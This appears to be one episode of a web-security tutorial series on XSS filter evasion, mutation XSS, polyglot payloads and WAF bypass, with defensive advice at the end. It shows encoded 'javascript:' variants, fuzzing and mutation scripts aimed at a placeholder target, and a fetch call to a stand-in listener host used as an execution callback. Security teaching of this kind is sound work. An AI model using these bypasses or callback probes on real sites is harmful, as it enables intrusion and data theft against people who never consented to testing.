XSS Filter Evasion, Polyglots & WAF Bypass Tactics

Learn advanced XSS filter evasion, polyglot payloads, and WAF bypass tactics to understand modern client-side attack paths and defenses.

By Episode 3, we were tracing tainted data through modern frontend code like a bloodhound: source, transform, sink, execution. But real targets rarely hand you a clean innerHTML sink with zero defenses. They give you “sanitization,” regex filters, brittle blacklist logic, WAF signatures, markdown renderers, HTML rewriters, and browser parsers that do not agree with the developer’s mental model. That gap between what defenders think they blocked and what the browser actually does is where filter evasion lives.

This episode is about exploiting that gap safely and systematically. We’ll look at how naive sanitizers fail, why parser differentials matter, how mutation XSS turns “sanitized” markup back into active code, how polyglot payloads survive uncertainty, and how to reason about WAF bypasses without devolving into payload cargo culting. The goal is not memorizing a zoo of strings. It’s learning how to generate bypasses from first principles.

Why filters fail: the browser is not a regex engine

Most broken XSS defenses fail for one of four reasons:

They sanitize the wrong context
- HTML escaping used for JavaScript
- URL validation used for HTML attributes
- Server-side filtering applied before client-side decoding
They normalize incompletely
- Single decoding pass
- Case-sensitive checks
- Failure to canonicalize whitespace, entities, or Unicode forms
They misunderstand parser behavior
- HTML parser repairs malformed markup
- Attribute parsing is more permissive than expected
- Browser mutation rewrites DOM in dangerous ways
They rely on blacklists
- Block <script> but allow event handlers
- Block onerror but allow srcdoc
- Block javascript: literally but miss encoded or transformed variants

A typical anti-pattern looks like this:

function weakSanitize(input) {
  return input
    .replace(/<script.*?>.*?<\/script>/gi, '')
    .replace(/onerror/gi, '')
    .replace(/onload/gi, '');
}

element.innerHTML = weakSanitize(userInput);

This filter assumes:

script tags are the only execution path
event handlers are known and enumerable
the payload arrives in one stable textual form
the browser won’t reinterpret malformed HTML

All of those assumptions are false.
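To make the failure concrete, here is a minimal Python sketch that ports the same three replacements and runs a few benign probes through them. The names `weak_sanitize` and `probe()` are illustrative only, and Python's `re` module is standing in for the JavaScript regexes, so treat it as an approximation of the filter rather than a faithful copy.

```python
import re

def weak_sanitize(text: str) -> str:
    """Illustrative Python port of the weakSanitize anti-pattern (single-pass blacklist)."""
    text = re.sub(r"<script.*?>.*?</script>", "", text, flags=re.IGNORECASE)
    text = re.sub(r"onerror", "", text, flags=re.IGNORECASE)
    text = re.sub(r"onload", "", text, flags=re.IGNORECASE)
    return text

probes = [
    "<script>probe()</script>",            # the one case the filter anticipates
    "<img src=x ononerrorerror=probe()>",  # deleting the inner keyword reassembles it
    "<details open ontoggle=probe()>",     # a handler that was never on the blacklist
]

for p in probes:
    print(repr(p), "->", repr(weak_sanitize(p)))
```

The second probe comes out as `<img src=x onerror=probe()>`: a single replacement pass deletes the inner `onerror` and lets the surrounding fragments join up. The third passes through untouched because the blacklist never listed that handler.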

Build a bypass workflow, not a payload list

As we saw in earlier episodes, context is everything. For evasion, add a second model:

input form → app transforms → filter/WAF transforms → browser parse → DOM mutation → execution

When facing a filter, answer these questions in order:

1. What exactly is being filtered?

Compare:

raw request
reflected response
live DOM after parsing
DOM after client-side rewrites

Use Burp Repeater and browser DevTools together. For example:

bash

curl -i 'https://target.example/search?q=%3Csvg%20onload%3Dconsole.log(1)%3E'

Then inspect:

whether the server rewrites case
whether entities are decoded once or twice
whether the browser inserts quotes, closes tags, or moves nodes
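A small helper can make the raw-versus-reflected comparison repeatable. The sketch below is only a rough first-pass classifier: `classify_reflection` and its labels are hypothetical names, and it only looks at the response body, so the live-DOM checks still have to happen in DevTools.

```python
import html
from urllib.parse import quote

def classify_reflection(probe: str, body: str) -> str:
    """Guess how a probe was transformed between request and response body."""
    if probe in body:
        return "raw"
    if html.escape(probe, quote=True) in body:
        return "html-escaped"
    if quote(probe, safe="") in body:
        return "url-encoded"
    if probe.lower() in body.lower():
        return "case-changed"
    return "absent-or-rewritten"

probe = "<svg onload=console.log(1)>"
sample_body = "<p>Results for &lt;svg onload=console.log(1)&gt;</p>"  # made-up response
print(classify_reflection(probe, sample_body))
```

Anything that lands in the last bucket deserves a manual look, since that is where partial stripping and double decoding tend to hide.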

2. Is the filter pre-parse or post-parse?

A server-side regex sees bytes. The browser sees tokens and nodes. If the filter strips <script> but allows malformed HTML that the browser repairs into executable DOM, you may have a parser differential.

3. Is there a decode or transform step after filtering?

Classic red flags:

URL decoding after validation
HTML entity decoding in a template helper
markdown rendering after “safe text” checks
client-side decodeURIComponent() before assignment to innerHTML

4. Can you switch execution primitives?

If <script> is blocked:

event handlers
SVG/MathML behaviors
iframe srcdoc
dangerous URL schemes where allowed
DOM clobbering into existing code paths
mutation-based reactivation

The right bypass is usually not “more obfuscation.” It’s “a different execution primitive.”

Canonicalization attacks: beat the filter’s view of the world

Canonicalization is the process of reducing multiple equivalent encodings to a single normalized form. Filters that inspect non-canonical input are fragile.

Mixed encoding and decoding mismatches

Suppose the application blocks javascript: in href values:

if (input.toLowerCase().includes('javascript:')) reject();

But later it decodes entities or percent-encoding before rendering. Then variants may survive validation and become active later.

Educational examples of transformations to test:

text

javascript:
java&#x73;cript:
java%73cript:
jav&#97;script:

The point is not that every modern browser will execute every variant in every context. The point is to test whether:

the filter inspects one representation
a later stage transforms it into another
the browser consumes the transformed version
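The three-step mismatch can be simulated offline. In this sketch, `naive_filter_allows` mirrors the substring check above, and `html.unescape` and `urllib.parse.unquote` stand in for whatever later decoding stage the application might have. Which stage actually exists on a given target is an assumption to verify, not something the code proves.

```python
import html
from urllib.parse import unquote

def naive_filter_allows(value: str) -> bool:
    """Mirror of the check above: reject only the literal substring."""
    return "javascript:" not in value.lower()

variants = ["javascript:", "java&#x73;cript:", "java%73cript:", "jav&#97;script:"]

for v in variants:
    after_entities = html.unescape(v)  # stand-in for a template helper decoding entities
    after_percent = unquote(v)         # stand-in for a later URL-decoding step
    print(f"{v!r}: allowed={naive_filter_allows(v)}, "
          f"entities->{after_entities!r}, percent->{after_percent!r}")
```

Every encoded variant passes the filter, and each one turns back into the literal scheme under exactly one of the two decoders. That pairing tells you which downstream transform to go looking for.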

Whitespace and control character confusion

Weak filters often look for exact substrings like onerror= or javascript:. Browser tokenization may tolerate surprising separators or normalization.

Probe for:

tabs
newlines
carriage returns
form feeds
multiple spaces
mixed case

Example fuzzing idea:

python

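# educational fuzz helper: insert each separator at every interior position
tokens = ["onload", "onerror", "javascript:"]
separators = [" ", "\t", "\n", "\r", "\f"]

for token in tokens:
    for sep in separators:
        for i in range(1, len(token)):
            # repr() keeps control characters visible in the output
            print(repr(token[:i] + sep + token[i:]))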

Again, the value is not a magic string. It’s observing whether the target canonicalizes before checking.
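URL schemes are one place where separator tolerance is well defined: browser URL parsing trims leading and trailing control characters and spaces, and drops ASCII tabs and newlines anywhere in the input. The sketch below loosely imitates that preprocessing so it can be compared with a literal prefix check. `approx_browser_scheme` and `naive_scheme_check` are hypothetical helpers and are not a substitute for a real URL parser.

```python
import re

C0_OR_SPACE = "".join(chr(c) for c in range(0x21))  # U+0000 through U+0020
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*$")

def approx_browser_scheme(url: str) -> str:
    """Approximate the scheme a browser would see after URL preprocessing."""
    cleaned = url.strip(C0_OR_SPACE)   # trim leading/trailing controls and spaces
    for ch in "\t\n\r":                # tabs and newlines are removed everywhere
        cleaned = cleaned.replace(ch, "")
    scheme, sep, _rest = cleaned.partition(":")
    if sep and SCHEME_RE.match(scheme):
        return scheme.lower()
    return ""                          # no scheme: treated as a relative URL

def naive_scheme_check(url: str) -> bool:
    """The kind of literal prefix check a weak filter performs."""
    return not url.lower().startswith("javascript:")

candidate = "java\tscript:probe()"
print(naive_scheme_check(candidate), approx_browser_scheme(candidate))
```

The literal check accepts the candidate while the approximated browser view still reports `javascript`. That is the canonicalize-before-checking gap in miniature.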

Double decoding bugs

A common anti-pattern:

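const input = req.query.q;           // wire value %253Csvg...%253E; the framework's own decode typically leaves %3Csvg...%3E
if (input.includes('<')) reject();   // sees no literal <
const decoded = decodeURIComponent(input);  // second decode restores <svg...>
element.innerHTML = decoded;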

Test for this with staged encoding. If one decode happens server-side and another client-side, payloads can emerge only at the sink.
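Staged encoding is easy to reason about offline before touching the target. This sketch uses `urllib.parse.unquote` as a stand-in for each decode stage. `decode_layers` is a hypothetical helper that counts how many passes still change the value, which is a quick way to tell single-encoded from double-encoded probes.

```python
from urllib.parse import unquote

def contains_angle_bracket(value: str) -> bool:
    """The literal check from the pattern above."""
    return "<" in value

def decode_layers(value: str, limit: int = 5) -> int:
    """Count how many percent-decoding passes change the value (bounded)."""
    layers = 0
    while layers < limit:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return layers

wire = "%253Csvg%253E"                    # double-encoded probe as sent
after_first = unquote(wire)               # what the first decode stage produces
after_second = unquote(after_first)       # what a second decode stage produces

print(after_first, contains_angle_bracket(after_first))
print(after_second, contains_angle_bracket(after_second))
print(decode_layers(wire))
```

The check runs on the intermediate form, which has no literal `<`. The bracket only appears after the second decode, at which point nothing is validating it anymore.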

Parser confusion: the browser repairs your exploit for you

HTML parsers are designed to recover from broken markup. Filters are often designed as if malformed input just stays malformed.

Attribute breakout via quote assumptions

If a filter only escapes double quotes but not single quotes, backticks, or unquoted attribute edge cases, you may still break context depending on how the template is built.

Example vulnerable template:

html

<div data-name='USER_INPUT'></div>

Weak defense:

input = input.replace(/"/g, '&quot;');

That does nothing for single-quoted context.

A safe way to test behavior without immediate execution is to inject benign markers and inspect the repaired DOM:

text

' data-probe='x

Then see whether a new attribute appears in DevTools. Once you confirm breakout, you can move to an execution primitive appropriate for that context.
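The same marker test can be rehearsed locally. The sketch below renders the single-quoted template with the weak double-quote escaping and lists the attributes a parser recovers. Note the assumptions: `render` and `attributes_after_parse` are made-up helpers, and Python's `html.parser` is not a browser parser, so this only illustrates the breakout and does not replace checking the live DOM.

```python
from html.parser import HTMLParser

class AttrCollector(HTMLParser):
    """Records every start tag together with its parsed attributes."""
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, attrs))

def render(user_input: str) -> str:
    """Single-quoted template with the weak defense (only double quotes escaped)."""
    escaped = user_input.replace('"', "&quot;")
    return f"<div data-name='{escaped}'></div>"

def attributes_after_parse(markup: str):
    collector = AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.seen

print(attributes_after_parse(render("alice")))
print(attributes_after_parse(render("' data-probe='x")))
```

With the benign marker, the element gains a second attribute named `data-probe`, which confirms the breakout without running any script.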

Tag balancing and browser auto-closing

Applications often strip > or specific tags but leave enough structure for the parser to reconstruct dangerous markup.

For example, if a markdown or HTML filter allows fragments like this through:

html

<svg

and later concatenation or parser repair completes the node, you may get executable elements despite incomplete original input.

Foreign content: SVG and MathML

Some sanitizers focus on HTML tags and forget that browsers parse SVG and MathML with their own rules. Historically, this has been fertile ground for bypasses and mutation XSS.

Even when direct script execution is blocked, foreign-content parsing can:

create unexpected namespaces
preserve attributes differently
mutate when inserted into the DOM
interact badly with sanitizers that serialize and reparse markup

Mutation XSS: sanitized now, dangerous later

Mutation XSS, or mXSS, happens when markup is sanitized into a form that appears inert, but browser parsing or DOM mutation transforms it into executable markup later.

This matters because many sanitizers work like this:

parse untrusted HTML
remove dangerous nodes/attributes
serialize back to a string
assign that string to innerHTML somewhere else

That final reparse can change semantics.

Why mXSS happens

Different stages may use:

different parsers
different namespaces
different serialization rules
different DOM repair logic

A sanitizer may inspect one DOM tree, but the browser eventually executes another.

Practical testing pattern

When you suspect mXSS:

Put the candidate payload through the application normally.
Capture the stored/rendered HTML.
Reinsert that exact output into a local test harness.
Compare:
- original input
- sanitizer output
- final DOM after browser parse

Minimal harness:

html

<!doctype html>
<html>
<body>
<div id="app"></div>
<script>
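  // Paste the captured output below; escape backticks, ${ sequences, and closing script tags so the literal stays intact.
  const sanitizedOutput = `PASTE_OUTPUT_HERE`;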
  document.getElementById('app').innerHTML = sanitizedOutput;
  console.log(document.getElementById('app').innerHTML);
</script>
</body>
</html>

If the browser mutates the markup into something more dangerous than the sanitizer intended, you’ve got a strong lead.
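Once you have the three strings (original input, sanitizer output, and the `innerHTML` the harness logs), a plain text diff makes small mutations easier to spot than eyeballing. This is a minimal sketch built on the standard `difflib` module. `diff_stages` is a hypothetical helper, and the sample strings are placeholders to paste over.

```python
import difflib

def diff_stages(before: str, after: str, before_name: str, after_name: str) -> list[str]:
    """Return unified-diff lines between two pipeline stages (empty if identical)."""
    return list(difflib.unified_diff(
        before.splitlines(), after.splitlines(),
        fromfile=before_name, tofile=after_name, lineterm=""))

# Placeholder values: replace with what you captured from the target and harness.
sanitizer_output = "<p>hello<b>world</p>"
final_dom = "<p>hello<b>world</b></p>"

for line in diff_stages(sanitizer_output, final_dom, "sanitizer_output", "final_dom"):
    print(line)
```

An empty diff means the reparse was stable for that sample. Any non-empty diff is a place where the browser and the sanitizer disagreed about structure.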

What to look for

Look for:

attribute reordering or quote insertion
namespace changes in SVG/MathML
unexpected node creation
repaired malformed tags
text becoming markup after decode/reparse chains

Modern hardened sanitizers have reduced many historical mXSS cases, but bespoke sanitizers and legacy libraries still fail here.

Polyglots: payloads for uncertain contexts

Polyglot payloads are designed to remain syntactically meaningful across multiple parsing contexts. They’re useful when:

the exact sink is unclear
your input may land in HTML, attribute, JS string, or URL contexts depending on route or template branch
you need a discovery probe that survives transformations

A polyglot is not a universal instant-win string. It’s a reconnaissance tool and sometimes a bypass aid.

What makes a good polyglot

A useful polyglot:

breaks out of multiple likely contexts
degrades gracefully if one context fails
includes a low-noise execution or callback primitive
is short enough to survive truncation and storage quirks

Example strategy, not magic

Instead of memorizing one famous payload, think in layers:

close current context if possible
open a new executable context
leave trailing characters harmless

For example, if your input might appear in:

HTML text
quoted attribute
script string

you want a prefix that can terminate at least some of those contexts, then fall into a new tag or handler.

A safe discovery-oriented approach is to use a callback marker rather than alert():

fetch('https://listener.example/xss?probe=polyglot4')

Then embed that callback in a context-appropriate primitive after you learn where breakout occurs.

Polyglots and WAFs

Polyglots often trigger signatures because they contain many suspicious delimiters. On hardened targets, a smaller context-specific bypass usually beats a giant “works everywhere” string.

Use polyglots to map uncertainty. Use precision payloads to land the exploit.

WAF bypass tactics: think like a normalizer

WAFs usually inspect HTTP requests, not final browser DOM. That means they lose whenever:

dangerous semantics emerge only after app-side transforms
the payload is split across parameters or requests
the browser repairs malformed input into executable markup
client-side code assembles the final sink value

Parameter fragmentation

If a frontend concatenates multiple values into one sink, but the WAF inspects parameters independently, execution can emerge only after assembly.

Example pattern:

const html = part1 + part2 + part3;
target.innerHTML = html;

You may see this in template fragments, markdown options, or widget configs.
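A toy model shows why per-parameter inspection misses this. Everything here is hypothetical: `SIGNATURE` is an invented rule rather than any real WAF's, and `waf_allows` simply checks each parameter value on its own, the way the text describes.

```python
import re

# Invented signature for illustration; real WAF rules are more elaborate.
SIGNATURE = re.compile(r"<svg[^>]*\bonload\s*=", re.IGNORECASE)

def waf_allows(params: dict[str, str]) -> bool:
    """Per-parameter inspection: each value is checked in isolation."""
    return not any(SIGNATURE.search(value) for value in params.values())

params = {"part1": "<svg o", "part2": "nload=", "part3": "probe()>"}

# What the frontend builds before assigning to the sink.
assembled = "".join(params[key] for key in ("part1", "part2", "part3"))

print("WAF allows request:", waf_allows(params))
print("Assembled value:", assembled)
print("Signature matches assembled value:", bool(SIGNATURE.search(assembled)))
```

No single fragment matches, yet the concatenated value does. The same reasoning applies when the fragments arrive in separate requests and are joined from storage.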

JSON and nested structures

WAF rules tuned for URL parameters often miss payloads hidden in:

JSON bodies
arrays
nested object fields
GraphQL variables

Use realistic content types:

bash

curl -i https://target.example/api/profile \
  -H 'Content-Type: application/json' \
  --data '{"bio":"<probe>"}'

Then observe how that field is rendered later.
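To probe nested bodies systematically, it helps to enumerate every string field and where it sits. The sketch below walks a decoded JSON document and yields a path for each string leaf. `iter_string_leaves` and the `$`-style path notation are illustrative choices, and the sample body is invented.

```python
import json
from typing import Any, Iterator

def iter_string_leaves(node: Any, path: str = "$") -> Iterator[tuple[str, str]]:
    """Yield (path, value) for every string nested inside dicts and lists."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from iter_string_leaves(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_string_leaves(value, f"{path}[{index}]")

# Invented example body with a nested, URL-valued field.
body = json.loads(
    '{"bio": "<probe>", "links": [{"label": "site", "url": "javascript:"}], "age": 30}'
)

for path, value in iter_string_leaves(body):
    print(path, repr(value))
```

Each path is a candidate injection point to test individually, and also a reminder of what a rule tuned only for top-level URL parameters would never see.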

Alternate request paths

A WAF may protect the main web app but not:

API subdomains
upload processors
preview endpoints
websocket/bootstrap APIs
mobile-specific endpoints

The XSS sink is often downstream from the protected edge.

Signature evasion versus semantic evasion

There are two very different ways to bypass a WAF:

Signature evasion
- alter bytes so the WAF misses a known pattern
- case changes, encoding, fragmentation
Semantic evasion
- use a different browser feature than the WAF expects
- no <script>, no obvious handler, no literal dangerous scheme

Semantic evasion is usually more reliable because it survives normalization. If the WAF blocks <script>, don’t spend all day trying to smuggle <script>. Ask what other executable semantics the browser accepts in that sink.

Differential analysis: app, WAF, browser

The cleanest way to study bypasses is differential testing.

Step 1: establish a baseline probe set

Use harmless probes first:

text

xsstest123
"><xsstest>
' data-probe='1
<svg
javascript:

Step 2: compare responses through different paths

direct app response
response behind CDN/WAF
mobile/API path
stored render path
live DOM after framework hydration

Step 3: automate mutations

A tiny mutation harness can save hours:

python

import itertools
import requests

base = "https://target.example/search"
parts = ["<svg", "<img", "onload", "onerror", "srcdoc", "javascript:"]
encoders = [
    lambda s: s,                        # identity baseline
    lambda s: s.upper(),                # case variation
    lambda s: s.replace("a", "&#97;"),  # entity-encode the letter "a"
]

# Deduplicate: the entity encoder leaves parts without an "a" unchanged.
candidates = sorted({e(p) for p, e in itertools.product(parts, encoders)})

for candidate in candidates:
    r = requests.get(base, params={"q": candidate}, timeout=10)
    print(candidate, r.status_code, len(r.text))

This won’t “find XSS” by itself. It highlights normalization differences, blocking thresholds, and weird reflections worth manual follow-up.

Real-world anti-patterns worth hunting

Weak markdown sanitization

Pipeline:

user markdown
markdown renderer
HTML allowlist
final innerHTML

Problems:

raw HTML partially allowed
links/images insufficiently validated
post-render rewrites introduce dangerous attributes
code fences or embedded HTML mutate on reparse

“Strip tags” then trust output

Classic bug:

input = input.replace(/<[^>]+>/g, '');

This is not sanitization. It can be bypassed by malformed markup, entity tricks, parser repair, and anything that becomes markup later through decoding or concatenation.
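Two of those failure modes can be shown with the same regex in Python. In this sketch, `strip_tags` mirrors the one-liner above, the `<p>` wrapper is an assumed template, and `html.unescape` stands in for any later entity-decoding step.

```python
import html
import re

def strip_tags(text: str) -> str:
    """Same idea as the one-liner above: delete anything shaped like <...>."""
    return re.sub(r"<[^>]+>", "", text)

# 1. An unclosed tag has no ">" for the regex to match, so it survives intact.
unclosed = "<img src=x onerror=probe() "
page = f"<p>{strip_tags(unclosed)}</p>"  # assumed template supplies the closing ">"
print(page)

# 2. Entity-encoded markup is invisible to the regex and reappears after decoding.
encoded = "&lt;img src=x onerror=probe()&gt;"
print(html.unescape(strip_tags(encoded)))
```

In the first case, a browser tokenizer keeps reading the tag until the next `>`, which the surrounding template provides. In the second, the markup only exists after a decode step that runs once the filter has already finished.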

Client-side sanitization only

If the server stores raw input and the browser sanitizes on render, any alternate render path, legacy client, or admin tool may become exploitable.

Homegrown allowlists

Developers allow “safe tags” but forget:

dangerous attributes
namespace-specific behavior
URL-valued attributes
srcdoc
custom elements interacting with framework code
DOM clobbering side effects

Defenses that actually hold up

Evasion exists because defenses are often ad hoc. The answer is not a bigger blacklist.

1. Eliminate dangerous sinks where possible

Prefer:

textContent
innerText
safe attribute setters for known-safe attributes
framework auto-escaping paths

Avoid raw HTML insertion unless absolutely necessary.

2. Use context-correct output encoding

Encode for the exact sink:

HTML text
HTML attribute
JavaScript string
CSS
URL

One encoder does not fit all contexts.
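As a rough illustration of why the contexts differ, here are four small encoders built only on the Python standard library. The function names are hypothetical, the attribute encoder assumes the value is placed inside a quoted attribute, and CSS is deliberately left out because it needs its own escaping rules.

```python
import html
import json
from urllib.parse import quote

def for_html_text(value: str) -> str:
    """Escape &, <, > for placement between tags."""
    return html.escape(value, quote=False)

def for_html_attribute(value: str) -> str:
    """Also escape both quote characters; assumes a quoted attribute."""
    return html.escape(value, quote=True)

def for_js_string(value: str) -> str:
    """JSON string literal, with <, >, & escaped so it is safe inside a script block."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))

def for_url_component(value: str) -> str:
    """Percent-encode everything outside the unreserved set."""
    return quote(value, safe="")

sample = "\"><x y='z'>&"
print(for_html_text(sample))
print(for_html_attribute(sample))
print(for_js_string("</script>"))
print(for_url_component("a b&c=d"))
```

The same input produces four different outputs, and using one where another is needed is exactly the wrong-context failure described at the top of this episode.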

3. Sanitize with a mature HTML sanitizer

Use a well-maintained sanitizer with:

secure defaults
namespace-aware parsing
active patching for mXSS and browser quirks

Then keep it updated. Old sanitizer versions are frequent bypass targets.

4. Normalize before validation

If you must validate structured input:

decode once in a controlled place
normalize case and Unicode where relevant
reject ambiguous forms
avoid multi-stage decode pipelines
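One way to read those four bullets as code: decode exactly once, refuse anything that would still change under a second decode, then normalize Unicode and case before any check runs. This is a sketch under assumptions. `canonicalize` and `AmbiguousInput` are hypothetical names, and rejecting all residual percent-encoding is a strict policy that may be too aggressive for some inputs.

```python
import unicodedata
from urllib.parse import unquote

class AmbiguousInput(ValueError):
    """Raised when a value still looks encoded after the single allowed decode."""

def canonicalize(raw: str) -> str:
    decoded = unquote(raw)                       # the one controlled decode
    if unquote(decoded) != decoded:              # a second decode would change it
        raise AmbiguousInput("value still contains percent-encoding after one decode")
    # Fold compatibility forms (e.g. fullwidth letters) and case before validation.
    return unicodedata.normalize("NFKC", decoded).casefold()

print(canonicalize("JavaScript%3A"))
print(canonicalize("\uff4aavascript:"))
try:
    canonicalize("%253Csvg")
except AmbiguousInput as exc:
    print("rejected:", exc)
```

Validation then runs on the returned value only, and that same value is what gets passed downstream, so there is no later stage in which a different representation can emerge.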

5. Enforce browser-side mitigations

We’ll go deep on these in a later episode, but the high-level stack is:

strong CSP
Trusted Types
safe templating
no inline event handlers
no string-to-code APIs

These controls don’t replace sanitization, but they dramatically reduce exploitability when sanitization fails.

6. Test sanitizers against browser reality

Unit-test with:

hostile HTML samples
serialization/reparse cycles
SVG/MathML cases
framework hydration paths
stored and reflected render paths

If your sanitizer only passes string-based tests and never browser DOM tests, you’re flying blind.

A practical lab mindset

When you hit a filtered target, don’t ask, “What payload bypasses this WAF?”

Ask:

What representation does the filter inspect?
What transformations happen after inspection?
What parser will ultimately interpret the data?
Can I shift to a different execution primitive?
Can browser mutation reactivate something the sanitizer thought was inert?

That mindset scales far better than memorizing 500 payloads from a gist.

A good engagement notebook for this episode’s techniques should track:

text

Input sent:
Observed server reflection:
Observed DOM after parse:
Observed DOM after client rewrite:
Blocked by WAF?:
Normalized/decoded?:
Potential alternate primitive:
Stored path differs?:

That structure turns “try random payloads” into disciplined exploit development.

Closing thoughts

Filter evasion is not wizardry. It’s just exploiting mismatches: between bytes and tokens, strings and DOM nodes, validation and canonicalization, sanitizer output and browser mutation, WAF signatures and actual execution semantics. The strongest attackers are not the ones with the biggest payload list. They’re the ones who can explain exactly why a bypass works.

In the next episode, we’ll assume you’ve landed code execution and move to what matters most in a real assessment: impact. We’ll chain XSS into account takeover, privileged action abuse, token theft, and sensitive data exfiltration—the difference between “it pops” and “this is business-critical.”
